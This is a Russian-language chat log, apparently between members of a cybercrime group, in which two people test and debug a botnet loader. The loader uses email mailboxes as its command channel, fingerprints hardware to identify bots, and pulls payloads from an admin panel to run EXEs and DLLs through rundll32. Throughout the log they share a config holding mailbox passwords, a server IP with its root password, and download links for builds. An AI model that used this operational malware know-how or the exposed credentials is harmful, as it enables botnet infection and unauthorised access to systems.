[29.09.21 16:31:42] angelo:		)))
[29.09.21 16:31:43] angelo:		шучу
[29.09.21 16:31:46] angelo:		права умный
[29.09.21 16:32:00] brooks:		нет, я если что излишки мозгов в коробочку и в холодильник, чтобы не испортились
[29.09.21 16:32:11] angelo:		говорят они вкусные
[29.09.21 16:33:03] angelo:		короче, я постараюсь проверить догадку меняя ИП, так как пока всё сводиться к этому
[29.09.21 16:33:08] brooks:		т.к. я не знаю, что будут передавать этим транспортом (эта прога - одно из частных решений по использовванию), то данные могут быть и бинарными
[29.09.21 16:33:56] brooks:		поэтому данные сначала переводятся в текстовый вид - некоторый рассказ на суахили (или что-то близкое по внешнему виду)
[29.09.21 16:34:26] brooks:		можно ли это считать шифрованием - вряд ли, но некоторые проблемы читающему надеюсь создаст
[29.09.21 16:34:36] angelo:		прикольно
[29.09.21 16:34:45] angelo:		про "шифрование "
[29.09.21 16:35:27] brooks:		можно открыть почтовый ящик, запустить прогу, и постараться успеть поймать письма
[29.09.21 16:35:38] brooks:		сервер проверяет почту раз в минуту и потом ее удаляет
[29.09.21 16:35:42] angelo:		и ведь чего удобно, не нужна прокладка и можно быстро заменить пчтовый сервер
[29.09.21 16:35:59] brooks:		прокладка между сервером и админкой есть
[29.09.21 16:36:21] brooks:		но поменять действительно просто, с другой стороны - заблокировать почтовые ящики тоже не трудно
[29.09.21 16:36:38] brooks:		замена думаю легче, чем регить доменные имена
[29.09.21 16:36:45] angelo:		вот вот
[29.09.21 16:36:51] angelo:		времени меньше
[29.09.21 16:37:04] brooks:		можно задать набор почтовых ящиков, через которые идет обмен
[29.09.21 16:37:04] angelo:		оплата/активация/прикрутка
[29.09.21 16:37:12] brooks:		но они выбираются случайным образом
[29.09.21 16:37:18] angelo:		вот ты выдумщик
[29.09.21 16:37:31] brooks:		не я, силвер давно идею подкинул
[29.09.21 16:37:34] angelo:		ну будем надеется поработает долго система
[29.09.21 16:37:45] brooks:		как юзать будут
[29.09.21 16:43:30] angelo:		rundll32 x63.dll,dllman
[29.09.21 16:43:38] angelo:		тут ж всё так
[29.09.21 16:43:45] angelo:		пишет модуль не найден
[29.09.21 16:48:14] brooks:		у тебя же запускалось?
[29.09.21 16:48:30] angelo:		вот именно запускалось
[29.09.21 16:48:38] angelo:		а сейчас нет
[29.09.21 16:48:45] angelo:		запущу другую тачку
[29.09.21 16:48:55] brooks:		а ты х - по аглици или русски сделал?
[29.09.21 16:49:08] angelo:		обижаежь
[29.09.21 16:49:16] angelo:		я э именно его и запускал
[29.09.21 16:49:23] angelo:		именно этот же билд
[29.09.21 16:49:25] brooks:		отнюдь,  это невидимая ошибка
[29.09.21 16:49:35] brooks:		ну тогда должно работать
[29.09.21 16:51:03] brooks:		попробуй указать полный путь к библиотете
[29.09.21 17:03:07] angelo:		не получилось, машина может умерла уже
[29.09.21 17:03:09] angelo:		хз
[29.09.21 17:03:23] brooks:		хватит на сегодня
[29.09.21 17:03:24] angelo:		скажи
[29.09.21 17:03:32] angelo:		а что бы бот по новой стучался что сделать надо ?
[29.09.21 17:03:34] brooks:		пора отдыхать, даже железо работать уже не хочет
[29.09.21 17:03:39] angelo:		))
[29.09.21 17:03:43] brooks:		что значит по новой?
[29.09.21 17:03:52] angelo:		ну я откатил тачку
[29.09.21 17:03:59] angelo:		загрузил бота и проснулся снова тот же
[29.09.21 17:04:03] brooks:		запусти прогу и все
[29.09.21 17:04:13] brooks:		правильно, и другого не будет
[29.09.21 17:04:22] brooks:		здесь идентификатор вычисляется по железу
[29.09.21 17:04:36] brooks:		и его изменить нельзя
[29.09.21 17:04:48] angelo:		даже если меняешь Ип имя компа ?!
[29.09.21 17:04:53] brooks:		ага
[29.09.21 17:05:12] brooks:		там привязка вроде к процессору, номеру жесткого диска и еще чего-то
[29.09.21 17:05:41] brooks:		мало ли что юзер захочет изменить
[29.09.21 17:05:52] brooks:		но от нашего зоркого глаза не скроется :)
[29.09.21 17:06:00] angelo:		ишь как всё сложно
[29.09.21 17:06:46] angelo:		а команды в бот я набиваю прям кучкой да ?
[29.09.21 17:06:50] angelo:		просто вот странно
[29.09.21 17:06:56] brooks:		не знаю
[29.09.21 17:07:03] angelo:		все же - 1) 3 команды ни одна не отработала
[29.09.21 17:07:06] brooks:		про команды я ничего не знаю
[29.09.21 17:07:14] angelo:		2) была вписана одна команда - отработала
[29.09.21 17:07:16] angelo:		понял
[29.09.21 17:07:20] brooks:		это запуск длл?
[29.09.21 17:07:24] brooks:		3,
[29.09.21 17:07:28] brooks:		3?
[29.09.21 17:07:53] brooks:		или ты три сразу поставил?
[29.09.21 17:07:59] angelo:		3го бота не было с ккомандами
[29.09.21 17:08:02] angelo:		сразу три
[29.09.21 17:08:08] angelo:		в одном на поверку
[29.09.21 17:08:14] brooks:		должны отрабатывать
[29.09.21 17:08:22] angelo:		не отработали (
[29.09.21 17:08:29] brooks:		оставляй до завтра
[29.09.21 17:08:30] angelo:		попробую ещё раз
[29.09.21 17:08:36] brooks:		а может ты просто не дождался?
[29.09.21 17:08:47] angelo:		так
[29.09.21 17:08:50] angelo:		давай ещё раз
[29.09.21 17:08:55] angelo:		чего я должен ждать был ?
[29.09.21 17:09:06] brooks:		иди отдыхать, завтра это решим
[29.09.21 17:09:11] angelo:		ну погоди
[29.09.21 17:09:14] angelo:		обьясни мысль
[29.09.21 17:09:30] brooks:		идет отстук, заданий нет, появляется запись в админке
[29.09.21 17:09:54] brooks:		ты ставишь задания, но выполняться они будут не раньше, чем ты указал параметр minPause
[29.09.21 17:10:01] angelo:		так
[29.09.21 17:10:13] brooks:		может просто не дождался, пока это время пройдет
[29.09.21 17:10:22] angelo:		я не вырубал
[29.09.21 17:10:28] angelo:		машины если ты об этом
[29.09.21 17:10:28] brooks:		но не позже, чем maxParam
[29.09.21 17:10:33] angelo:		об этом же ?
[29.09.21 17:10:41] brooks:		почти
[29.09.21 17:10:55] brooks:		т.е. и отметки не было, что выполнилось?
[29.09.21 17:11:01] angelo:		нет
[29.09.21 17:11:11] angelo:		где 3 задания заданы сразу ничего
[29.09.21 17:11:12] brooks:		а может это твое US?
[29.09.21 17:11:26] angelo:		ну хз
[29.09.21 17:11:38] angelo:		админка мой ип прочла как Сербию
[29.09.21 17:11:53] brooks:		давай завтра разберемся что такое US, а потом будем думать про количество заданий
[29.09.21 17:12:00] brooks:		мне ус совсем не нравится
[29.09.21 17:12:01] angelo:		ну ок
[29.09.21 17:12:08] angelo:		))
[29.09.21 17:12:17] angelo:		да хз ещё в чем дело
[29.09.21 17:12:22] angelo:		мож я крипорукий
[29.09.21 17:12:29] brooks:		привлечем админов, подумаем
[29.09.21 17:12:42] brooks:		дело не в криворукости, возможно, ты косяк какой нашел
[29.09.21 17:13:02] angelo:		оооо, я умею находить то что у других не выскакивает ((
[29.09.21 17:13:14] brooks:		и это хорошо
[29.09.21 17:13:26] brooks:		потом у юзеров будет меньше проблем и вопросов
[29.09.21 17:13:40] angelo:		тоже верно
[29.09.21 17:13:49] angelo:		а могли две команды конфликтануть ?
[29.09.21 17:13:56] brooks:		не должны
[29.09.21 17:14:01] angelo:		unknown 	2021-09-29, 12:27:59 	• 	1 		testBurden_x64.exe --file=c:\testBurden\textEXE.txt 	
unknown 	2021-09-29, 11:43:35 	• 	9 		PowerShell "$t = '12345'; $t>c:\yy\file.txt" 	
unknown 	2021-09-29, 11:27:52 	• 	0 		/C PowerShell "$t = '12345'; $t>c:\xx\file2.txt
[29.09.21 17:14:06] angelo:		вот такие я сдела три
[29.09.21 17:14:10] brooks:		админка их выдает последовательно только после получения подтверждения
[29.09.21 17:14:18] angelo:		аааа
[29.09.21 17:14:28] brooks:		каталоги хх и уу создал?
[29.09.21 17:14:34] angelo:		конечно !
[29.09.21 17:14:43] brooks:		ну мало ли
[29.09.21 17:14:59] angelo:		а как мне сейчас с нуля сделать на этой машине ?
[29.09.21 17:15:06] angelo:		удалить команды просто ?
[29.09.21 17:15:12] brooks:		удали все из админки и перезапусти прогу
[29.09.21 17:15:22] angelo:		понял
[29.09.21 17:15:29] brooks:		можно и отстук удалить, а можно оставить, только новые задания поставить
[29.09.21 17:15:39] angelo:		откатывать не обязательно ?
[29.09.21 17:15:41] angelo:		ВМ
[29.09.21 17:15:42] brooks:		а можно оставить и те, что есть, посмотрим, должна бы отработаать
[29.09.21 17:15:47] brooks:		не надо
[29.09.21 17:16:33] angelo:		2021-09-29, 16:20:15 	• 	1 		testBurden_x64.exe --file=c:\\testBurden\\testEXE.txt 	
unknown 	2021-09-29, 14:55:37 	2021-09-29, 15:05:18 	0 		/C PowerShell "$t = '12345'; $t>c:\xx\file2.txt
[29.09.21 17:16:42] angelo:		вот тут одна отработала
[29.09.21 17:16:45] angelo:		а вторая нет
[29.09.21 17:16:52] brooks:		смотри
[29.09.21 17:17:08] brooks:		с момента отстука есть один час ,чтобы забрать нагрузку
[29.09.21 17:17:38] brooks:		если я не успеваю, то админка меня отошьет, и в следующий раз я смогу забрать только после паузы
[29.09.21 17:18:07] brooks:		либо мне надо тогда делать отстук перед каждым забором нагрузки
[29.09.21 17:18:12] brooks:		может и стоит так переделать
[29.09.21 17:18:20] brooks:		завтра поправлю, так будет лучше
[29.09.21 17:19:20] angelo:		но ведь все равно бот должен забрать нагруз
[29.09.21 17:19:43] angelo:		либо сейчас либо после паузы
[29.09.21 17:19:47] brooks:		должен, но это может произойти на следующем сеансе связи
[29.09.21 17:20:02] angelo:		ну вот машины у меня стоят пол дня
[29.09.21 17:20:06] angelo:		больше 5-6 часов
[29.09.21 17:20:13] brooks:		и ничего?
[29.09.21 17:20:18] angelo:		не-а
[29.09.21 17:20:31] angelo:		вот один раз сработала команда на одном боте и всё
[29.09.21 17:20:44] brooks:		давай все-таки вопрос с US сначала закроем, чтобы не думалось
[29.09.21 17:21:18] angelo:		удалю боты и перезапущу боты заново
[29.09.21 17:21:20] angelo:		посмотрю
[29.09.21 17:21:24] brooks:		завтра удалишь все задания, кроме одного, любого
[29.09.21 17:21:34] brooks:		потом запустишь прогу на том же компе, как сегодня
[29.09.21 17:21:38] angelo:		а ну давай так
[29.09.21 17:21:41] brooks:		посмотрим,  отработает или нет
[29.09.21 17:22:13] brooks:		если отработает, поставишь это же задание еще раз (только удали результаты, а то не поймем, отработала или нет) и ждем
[29.09.21 17:22:39] brooks:		не позднее чем maxPause должен быть отстук
[29.09.21 17:24:19] angelo:		нувот я удалил две команды
[29.09.21 17:24:22] angelo:		запустил заново
[29.09.21 17:24:29] angelo:		вижу бот загорелся онлан
[29.09.21 17:24:41] angelo:		получается команда должна отработать через 1 час+10 минут
[29.09.21 17:24:49] angelo:		но не поздее 2х часов
[29.09.21 17:25:06] brooks:		нет, у тебя уже отстук бы, поэтому через 10 минут приблизительно
[29.09.21 17:26:02] angelo:		понял
[29.09.21 17:26:08] angelo:		как интересно:
[29.09.21 17:26:13] angelo:		пишет что отработал команду
[29.09.21 17:26:18] angelo:		но файла нету в папке
[29.09.21 17:26:34] angelo:		и появилась старая команда(одна из двух чт оя удалил)
[29.09.21 17:26:43] angelo:		бррррр
[29.09.21 17:26:48] brooks:		ты точно русский-английский в названиях папок не перепутал?
[29.09.21 17:26:59] angelo:		точно
[29.09.21 17:27:05] brooks:		команда где появилась?
[29.09.21 17:27:11] angelo:		в админке
[29.09.21 17:27:17] angelo:		unknown 	2021-09-29, 16:20:15 	• 	1 		testBurden_x64.exe --file=c:\\testBurden\\testEXE.txt 	
unknown 	2021-09-29, 14:55:37 	2021-09-29, 15:05:18 	0 		/C PowerShell "$t = '12345'; $t>c:\xx\file2.txt
[29.09.21 17:27:28] angelo:		вот первой не было, я её далил
[29.09.21 17:27:29] brooks:		я ничего по этому вопросу не скажу, админку я не делал
[29.09.21 17:27:34] brooks:		завтра рокко скажем
[29.09.21 17:27:40] angelo:		явно какой то глюк
[29.09.21 17:27:45] angelo:		не, я ща скажу
[29.09.21 17:27:49] brooks:		ага
[29.09.21 17:27:51] angelo:		и буду мучить
[29.09.21 17:27:51] brooks:		ок
[30.09.21 08:54:54] angelo:		c US все норм, отработали команды по другим Ипам
[30.09.21 08:55:00] angelo:		Приветик
[30.09.21 08:55:24] brooks:		привет, я еще не поправил код, сделаю - скину
[30.09.21 08:55:34] angelo:		окай
[30.09.21 08:55:49] angelo:		но с командами прям засада, не понял логику отработки/и не отработки команд
[30.09.21 08:56:02] brooks:		должны бы все работать
[30.09.21 08:56:23] angelo:		сейчас запущу другие машины
[30.09.21 08:56:35] brooks:		угу
[30.09.21 10:18:49] angelo:		скажи я могу проверять на ферме билд дллку ?
[30.09.21 10:18:55] angelo:		или подождать изменений в коде ?
[30.09.21 11:46:26] brooks:		повтори
[30.09.21 11:46:34] brooks:		комп перегружал, все потерял
[30.09.21 11:46:41] angelo:		скажи я могу проверять на ферме билд дллку ?
или подождать изменений в коде ?
[30.09.21 11:46:48] angelo:		только меня не теряй
[30.09.21 11:47:04] brooks:		ща, пять минут и будет
[30.09.21 11:47:20] angelo:		да не спеши
[30.09.21 12:00:29] brooks:		https://gofile.io/d/DfaVo3
[30.09.21 12:02:45] angelo:		напомни разширение
[30.09.21 12:02:51] angelo:		rar.*
[30.09.21 12:03:01] angelo:		как там далше после рар
[30.09.21 12:04:12] brooks:		0.rar.pgp
[30.09.21 12:12:05] angelo:		я просто заменяю эти два файла ?
[30.09.21 16:15:02] angelo:		кинь плиз ещё раз свой конфиг
[30.09.21 16:15:07] angelo:		удалил олень
[30.09.21 16:15:41] brooks:		```
minpause=32
maxpause=128
mail={test@14740-27223.bacloud.info|CKFYQ25SMyli2STV|14740-27223.bacloud.info|14740-27223.bacloud.info}
mail={w-1@14740-27223.bacloud.info}

```
[30.09.21 16:15:49] brooks:		время только поправь
[30.09.21 16:15:55] angelo:		угу
[30.09.21 16:15:57] angelo:		1 и 2
[30.09.21 16:16:08] brooks:		я немного не те вещи проверял, когда ставил такие числа
[30.09.21 16:16:24] angelo:		128 часов - надо думать
[01.10.21 07:33:43] angelo:		привет
[01.10.21 07:33:49] angelo:		не подумай что я дуоак
[01.10.21 07:33:57] brooks:		привет
[01.10.21 07:33:57] angelo:		ну вот не подумай пожалуйста
[01.10.21 07:34:05] brooks:		что-то пошло не так?
[01.10.21 07:34:13] angelo:		но меня вчера с этим триком так затрахали чт оя забыл сохранить твой конфиг
[01.10.21 07:34:20] angelo:		не, всё норм
[01.10.21 07:34:22] brooks:		:)
[01.10.21 07:34:23] angelo:		команды отработали
[01.10.21 07:34:27] brooks:		ща будет
[01.10.21 07:34:44] brooks:		```
minpause=32
maxpause=128
mail={test@14740-27223.bacloud.info|CKFYQ25SMyli2STV|14740-27223.bacloud.info|14740-27223.bacloud.info}
mail={w-1@14740-27223.bacloud.info}
```
[01.10.21 07:34:48] angelo:		окай
[01.10.21 07:34:54] angelo:		я ещё на двух машинах првоерю
[01.10.21 07:34:56] angelo:		и на ферму
[01.10.21 07:35:06] angelo:		с фермами долго, меня игнорируют
[01.10.21 07:35:17] brooks:		да, и попробуй их  на двух машинах запустить одновременно, а задания ставь разные
[01.10.21 07:35:48] angelo:		одинаковые билды запускать ?
[01.10.21 07:35:56] angelo:		то есть один и тот же
[01.10.21 07:35:58] angelo:		?
[01.10.21 07:36:11] brooks:		чтобы проверить, что несколько прог могут работать с одним почтовым ящиком на получение
[01.10.21 07:36:18] angelo:		я на часок отъеду и сделаю
[01.10.21 07:36:23] angelo:		понял
[01.10.21 07:36:28] brooks:		нет,  надо чтобы у них были разные строки адресов, где указываем пароли
[01.10.21 07:36:32] brooks:		да, давай
[01.10.21 07:36:47] angelo:		так погоди
[01.10.21 07:36:55] angelo:		а на какую менять ?
[01.10.21 07:36:55] brooks:		т.е. надо чтобы ящик, через который они отправляют и получают - были разными, а назначение - одно и то же
[01.10.21 07:37:07] angelo:		хм
[01.10.21 07:37:11] brooks:		а ты создавал
[01.10.21 07:37:12] angelo:		нужен второй ящик
[01.10.21 07:37:21] angelo:		ну инбокс не дает серваки юзать
[01.10.21 07:37:24] brooks:		и надо бы попробовать с одинаковыми конфигами, вдруг я корректно это разрулил
[01.10.21 07:37:28] angelo:		инбокс.лв
[01.10.21 07:37:34] angelo:		окей
[01.10.21 07:37:38] angelo:		почту возьму
[01.10.21 07:37:40] brooks:		я ща еще один ящик сделаю там же
[01.10.21 07:37:41] angelo:		у Хамера есть
[01.10.21 07:38:01] angelo:		отпиши тогда, а я побегу опаздываю
[01.10.21 07:38:02] brooks:		сначала проверим на своем сервере, потом можно попробовать на чужих
[01.10.21 07:38:06] brooks:		давай
[01.10.21 07:38:14] brooks:		придешь - стучи
[01.10.21 07:38:31] angelo:		обязательно дорогой!
[01.10.21 08:05:44] brooks:		```
angelo@14740-27223.bacloud.info:SDFGytr4%^yui8YHnBVCDrtyH
```
[01.10.21 10:42:40] brooks:		если у двух программ прогрузишь один и тот же свой адрес (который идет с паролем и именами серверов),  то отработает только то, который первым схватит данные
[01.10.21 10:42:58] brooks:		так что такой вариант не проверяй пока
[01.10.21 10:43:03] angelo:		не вижу
[01.10.21 10:43:07] angelo:		не вижу что пишешь
[01.10.21 10:43:21] brooks:		если у двух программ прогрузишь один и тот же свой адрес (который идет с паролем и именами серверов), то отработает только то, который первым схватит данные
так что такой вариант не проверяй пока
[01.10.21 10:43:27] angelo:		ещё раз
[01.10.21 10:43:28] angelo:		тест
[01.10.21 10:43:44] brooks:		перезапуст отр
[01.10.21 10:43:52] brooks:		если у двух программ прогрузишь один и тот же свой адрес (который идет с паролем и именами серверов), то отработает только то, который первым схватит данные
так что такой вариант не проверяй пока
[01.10.21 10:44:40] angelo:		аааа
[01.10.21 10:44:42] angelo:		вот оно как
[01.10.21 10:44:52] angelo:		то есть одновременная работа не возмона пока ?
[01.10.21 10:45:01] brooks:		с разных адресов
[01.10.21 10:45:07] angelo:		ну да, только так
[01.10.21 10:45:09] brooks:		я тебе дал адрес angelo@
[01.10.21 10:45:13] angelo:		угу
[01.10.21 10:45:26] brooks:		для одной копии старый, для другой angelo
[01.10.21 10:45:33] brooks:		и можно  одновременно ставить задания
[01.10.21 10:45:51] brooks:		только разные, чтобы понять, что они правильно отработали на нужных машинах
[01.10.21 12:06:52] angelo:		странно
[01.10.21 12:06:59] angelo:		боты пишет онлайн уже 20 минт
[01.10.21 12:46:35] brooks:		что значит онлайн? там нет такого режима совсем
[01.10.21 12:47:23] brooks:		если только онлайн считается час после отстука
[01.10.21 12:49:46] angelo:		админка показывла что боты были онлайн
[01.10.21 12:49:51] angelo:		около 30 минут после стука
[01.10.21 12:50:12] angelo:		/C PowerShell "$t = '12345'; $t>c:\xx\file2.txt
[01.10.21 12:50:16] angelo:		отработало
[01.10.21 12:50:17] brooks:		ну видимо она считает тот час, когда он готова отдавать задачи
[01.10.21 12:50:26] angelo:		на втором не отработало
[01.10.21 12:50:27] angelo:		testBurden_x64.exe --file=c:\\testBurden\\testEXE.txt
[01.10.21 12:50:27] brooks:		это хорошо
[01.10.21 12:50:47] angelo:		может я ошибся в команде
[01.10.21 12:50:54] brooks:		а отдельно, когда только один запущен, такая команда отрабатывает?
[01.10.21 12:51:07] angelo:		а вот посмотрим
[01.10.21 12:51:10] angelo:		сейчас
[01.10.21 12:51:10] brooks:		двойной слэш не надо ставить
[01.10.21 12:51:30] angelo:		могла из-за этого не отработать ?
[01.10.21 12:51:30] brooks:		это в сишном кода так пишется, я копирую, а надо только один ставить
[01.10.21 12:51:36] angelo:		ааа
[01.10.21 12:51:37] brooks:		возможно
[01.10.21 12:51:38] angelo:		понял
[01.10.21 12:51:50] angelo:		удалю и поставлю правильно
[01.10.21 12:51:55] brooks:		ок
[01.10.21 13:00:22] angelo:		погоди, если бот уже стукнул
[01.10.21 13:00:26] angelo:		и я ставлю задачу
[01.10.21 13:00:32] brooks:		ну и что
[01.10.21 13:00:37] angelo:		все равно ведь ждать пока бот заберет её
[01.10.21 13:00:41] brooks:		он еще раз стукнет, когда придет время
[01.10.21 13:00:47] brooks:		ну да
[01.10.21 13:00:48] angelo:		ну все
[01.10.21 13:00:59] angelo:		а то после вчера другое осталось в голове
[01.10.21 13:01:16] brooks:		я же поэтому и писал, что тестирование будет долгим и увлекательным
[01.10.21 13:01:53] angelo:		ну почему бы и нет, лучше так, чем вон с триком с адамовской суетой
[01.10.21 13:02:16] brooks:		:) ну да, ненапряжно :)
[01.10.21 13:02:43] angelo:		а почему бы не по НЕ напрягаться а ?)
[01.10.21 13:02:53] brooks:		:)
[01.10.21 13:03:25] angelo:		напрягаешься напрягаешь а поголе не погладят и спасибо не скажут
[01.10.21 13:03:45] angelo:		спасибо на хлеб плохо мажется
[01.10.21 13:04:21] angelo:		может есть ещё идея как протестить анкор ?
[01.10.21 13:04:34] angelo:		мало ли есть какие нибудь идеи про иные условия теста
[01.10.21 13:04:51] brooks:		не, тупо ставить задания, смотреть что отработали, ставить новые
[01.10.21 13:05:08] angelo:		а какие можно ещё поставить то ?
[01.10.21 13:05:17] angelo:		на линк можно залить наверно
[01.10.21 13:05:19] brooks:		да смотри список
[01.10.21 13:05:24] brooks:		можно и так
[01.10.21 13:05:37] brooks:		я только не знаю, пользуется кто этим или нет, но проверить надо
[01.10.21 13:05:54] angelo:		а есть нагрузка длл ?
[01.10.21 13:05:56] angelo:		ты мне екзешникик кидал
[01.10.21 13:06:08] brooks:		а я не помню, что я давал для длл
[01.10.21 13:06:11] angelo:		хотя у меня должны где то валяться
[01.10.21 13:06:21] angelo:		тестберн тот же
[01.10.21 13:06:24] angelo:		но длл
[01.10.21 13:06:30] angelo:		поищу
[01.10.21 13:06:36] brooks:		ща тоже посмотрю
[01.10.21 13:09:52] brooks:		https://gofile.io/d/fyVcz9
[01.10.21 13:13:57] angelo:		testBurden_x64.dll rundll32.exe testBurden_x64.dll --file=c:\testBurden\testEXE.txt
[01.10.21 13:14:10] angelo:		рандлл32.exe тут не лишняя ?
[01.10.21 13:14:17] angelo:		это фулл команд
[01.10.21 13:14:20] brooks:		ща
[01.10.21 13:14:35] brooks:		через рандлл ты запускаешь длл
[01.10.21 13:14:57] brooks:		точки входа Control_RunDLL
	entryPoint
        InitLib
[01.10.21 13:15:04] brooks:		бери любую
[01.10.21 13:15:29] angelo:		а точка входа идет после параметра ?
[01.10.21 13:15:39] brooks:		undll32.exe testBurden_x64.dll, entryPoint --file=c:\testBurden\testEXE.txt
[01.10.21 13:15:48] brooks:		это если ты хочешь вручную запустить
[01.10.21 13:16:00] angelo:		я отдаю команду
[01.10.21 13:16:02] brooks:		а как поставить в админке не знаю
[01.10.21 13:16:04] angelo:		инкода запуск нагрузки длл
[01.10.21 13:16:07] angelo:		понял )
[01.10.21 13:16:15] angelo:		будем пробовать
[01.10.21 13:16:27] angelo:		у нас же увлекательное и ненапряжное тестироание с тобой )
[01.10.21 15:30:31] angelo:		блин
[01.10.21 15:30:36] angelo:		ну почему команды не отрабатываются ?
[01.10.21 15:38:20] brooks:		так, какая не отработала?
[01.10.21 15:39:56] angelo:		ну вот
[01.10.21 15:39:57] angelo:		эти
[01.10.21 15:39:58] angelo:		unknown 	2021-10-01, 15:03:11 	• 	0 		/C PowerShell "$t = '12345'; $t>c:\xx\file.txt" 	
unknown 	2021-10-01, 12:54:41 	• 	5 		testBurden_x64.exe --file=c:\testBurden\testEXE.txt
[01.10.21 15:40:12] angelo:		а на первой машине не отработала нагрузка, но отработал шелкод
[01.10.21 15:40:35] brooks:		а на этих машинах ты проверял, есть c:\xx\file.txt
[01.10.21 15:40:39] brooks:		?
[01.10.21 15:40:58] angelo:		на одной есть где отработало
[01.10.21 15:41:07] angelo:		на второй соответственно не появился файл
[01.10.21 15:41:11] brooks:		а c:\testBurden\testEXE.txt
[01.10.21 15:41:17] angelo:		нету
[01.10.21 15:41:20] angelo:		ни там ни там
[01.10.21 15:41:37] brooks:		угу
[01.10.21 15:41:42] angelo:		вчера отработала команда на одной ВМ !
[01.10.21 15:41:43] brooks:		ща посмотрю логи на сервере
[01.10.21 15:41:52] angelo:		тестбарден
[01.10.21 15:42:02] angelo:		не понимаю логику выполнения команд, то да то нет
[01.10.21 15:46:26] brooks:		ты во сколько будешь в понедельник?
[01.10.21 15:47:31] angelo:		с каких нужно ?
[01.10.21 15:47:47] brooks:		не. когда планируешь?
[01.10.21 15:47:53] angelo:		с 10
[01.10.21 15:48:03] angelo:		могу и в выходные если нужно
[01.10.21 15:48:15] brooks:		ок, я постараюсь сделать  версию с логами и посмотрим, что же я получаю с сервера
[01.10.21 15:48:32] brooks:		в выходные не надо, нужно и отдыхать иногда
[01.10.21 15:48:40] angelo:		окай
[01.10.21 15:48:47] angelo:		меня ругать не будут ?
[01.10.21 15:48:52] angelo:		что так долго
[01.10.21 15:48:56] brooks:		попробуй сегодня еще раз поставить тестбурден
[01.10.21 15:49:05] angelo:		поставлю ок
[01.10.21 15:49:13] brooks:		оставь только одну машину и попробуй на ней
[01.10.21 15:49:18] brooks:		любую
[01.10.21 15:49:19] angelo:		окай
[01.10.21 15:49:20] angelo:		понял
[01.10.21 15:49:26] brooks:		если получится, то поменяй, и тоже попробуй
[01.10.21 15:49:33] brooks:		чтобы работала только одна
[01.10.21 15:49:36] angelo:		понял
[01.10.21 15:49:46] brooks:		не получится - оставляй до понедельника
[01.10.21 15:50:03] angelo:		хорошо
[01.10.21 15:50:11] brooks:		будем вмести смотреть
[01.10.21 15:50:17] angelo:		окай
[01.10.21 15:50:23] angelo:		без зп выходные
[01.10.21 15:50:27] angelo:		грустные выходные
[01.10.21 15:50:47] brooks:		если ты выходные нарисуешься в чате, возможно франс и выдаст
[01.10.21 15:50:54] brooks:		если поймаешь его и у него будет деньги
[01.10.21 15:51:06] brooks:		он здесь, спроси
[01.10.21 15:51:09] angelo:		да неее
[01.10.21 15:51:12] angelo:		в пн жди
[01.10.21 15:51:15] angelo:		точно говорю
[01.10.21 15:51:18] brooks:		я  тоже так думаю
[01.10.21 15:52:03] brooks:		а ты случайно тестбурден ставишь не на 32 разрядных машинах?
[01.10.21 15:52:18] brooks:		или я тебе обе сборки давал, под обе разрядности?
[01.10.21 15:52:36] brooks:		попробуй запустить тестбурден вручную на этой машине, отработает ли
[01.10.21 15:52:43] brooks:		а то может не там еще и проблему ищем
[01.10.21 15:54:38] angelo:		нет конечно
[01.10.21 15:54:38] angelo:		ты две кидал и 86 тоже
[01.10.21 15:54:38] angelo:		64 на 64
[01.10.21 15:54:38] angelo:		эм окай
[01.10.21 15:54:39] angelo:		о
[01.10.21 15:54:39] angelo:		отработал один
[01.10.21 15:54:44] angelo:		тест
[01.10.21 15:54:46] angelo:		повотри
[01.10.21 15:54:49] brooks:		тест
[01.10.21 15:54:54] angelo:		норм
[01.10.21 15:55:01] brooks:		попробуй запустить тестбурден вручную на этой машине, отработает ли
а то может не там еще и проблему ищем
[01.10.21 15:55:11] angelo:		сейчас попробую
[01.10.21 15:57:17] angelo:		отрабатывает
[01.10.21 15:57:32] brooks:		ок
[01.10.21 15:57:46] angelo:		testBurden_x64.dll rundll32.exe testBurden_x64.dll --file=c:\testBurden\testEXE
[01.10.21 15:57:55] angelo:		вот в этой команде что задается в админке
[01.10.21 15:58:04] angelo:		ервый элемент ведь лишний
[01.10.21 15:58:07] brooks:		это неправильная команада
[01.10.21 15:58:12] angelo:		но он подставляется в началае строки автоматом
[01.10.21 15:58:38] brooks:		ну не знаю, но в логах сервера я видел, что что-то скачали
[01.10.21 15:58:59] angelo:		хм
[01.10.21 15:59:04] angelo:		логи за сегодня ?
[01.10.21 15:59:04] brooks:		ладно, проверишь - напиши, что получилось или не получилось, и на сегодня хватит
[01.10.21 15:59:10] angelo:		окай
[01.10.21 15:59:12] angelo:		посижу пока
[01.10.21 15:59:16] angelo:		да какой хватит
[01.10.21 15:59:18] angelo:		я до 12 тут
[01.10.21 15:59:21] angelo:		наверно
[01.10.21 15:59:43] angelo:		потом ещё что нибудь, потмо клиент напишет, потмо Адам скажет что делать
[01.10.21 15:59:55] brooks:		слушайка, а это было вчера
[01.10.21 15:59:57] angelo:		и сидишь онлайн 12-14 часов в день
[01.10.21 16:00:02] brooks:		сегодня не видел ни одного скачивания
[01.10.21 16:00:12] angelo:		вот вот
[01.10.21 16:00:12] brooks:		ответ админки - заданий в очереди нет
[01.10.21 16:00:24] angelo:		интересно в чем разница
[01.10.21 16:00:29] angelo:		между вчера и сегодня
[01.10.21 16:00:37] angelo:		лана, поиграюсь посижу
[01.10.21 16:00:40] angelo:		отдыхай
[01.10.21 16:00:40] brooks:		что-то не так ставится задание
[01.10.21 16:00:56] brooks:		особо не засиживайся, ты мне в понедельник нужне отдохнувший
[01.10.21 16:00:57] angelo:		проверю и перепроверю
[01.10.21 16:01:03] angelo:		окай!
[01.10.21 16:01:08] angelo:		я так рад !!!!!
[01.10.21 16:01:09] brooks:		у тебя есть доступ на сервер?
[01.10.21 16:01:15] angelo:		с тобой снова )
[01.10.21 16:01:18] angelo:		не-а
[01.10.21 16:01:25] brooks:		170.130.165.62
5ba5a7be0b
[01.10.21 16:01:49] brooks:		файл /tmp/postMan.log
[01.10.21 16:02:02] brooks:		если интересно, зайди, посмотри запросы и ответы
[01.10.21 16:02:06] angelo:		прости а как на серв заходить ?
[01.10.21 16:02:13] angelo:		ип это же не линк
[01.10.21 16:02:16] brooks:		поднимаешь опенвпн
[01.10.21 16:02:29] brooks:		включаешь putty
[01.10.21 16:02:37] brooks:		юзер - root
[01.10.21 16:02:37] angelo:		ааааа
[01.10.21 16:02:43] brooks:		пароль я тебе дал
[01.10.21 16:02:52] brooks:		я обычно сразу запускаю mc
[01.10.21 16:02:53] angelo:		это на линухе ?
[01.10.21 16:02:58] angelo:		понял
[01.10.21 16:02:59] angelo:		что да
[01.10.21 16:03:03] brooks:		и потом как в старом добром нортоне
